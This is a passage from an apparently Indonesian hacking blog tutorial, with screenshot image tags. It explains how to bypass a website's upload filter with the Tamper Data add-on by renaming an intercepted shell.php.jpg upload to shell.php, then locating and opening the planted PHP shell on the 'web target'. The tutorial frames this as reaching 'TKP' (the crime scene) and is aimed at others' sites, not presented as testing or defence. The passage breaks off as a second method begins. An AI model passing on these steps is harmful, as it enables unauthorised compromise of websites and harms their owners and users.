src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRFrf72jicE2C3XaqDB9M6J_dU1f_V4XzUcbr8K7rYtQy5u_a2LM6qYUYKsHP3p4GeCGKmwtWj3XLEDJni5DaApLh4kJnud5X-oHeB1BTdPOYUhwvZOheJYj6VTo7FXqF_Jr2OoSDGULs/s1600/tamper+2.PNG" /> 7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /><img alt="" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjib39Ld-MyiprZzo-Jk_AP3UBLcoMtCWXa03WbpD9dk9L0UFtREpXGodhufgg8yQOW3bCiuyadX0s3oF4Uu7HJr6_CaRVsbr8HC8mWJ5fkFygEi5M3P3KRWzD9nxJ9UZew6G-rAMmioDc/s1600/tamper+3.PNG" /> Sekarang anda tinggal cari dimana file shell anda berada . Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini

Cara ( Upload file PHP ) dengan Tamper Data

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung ...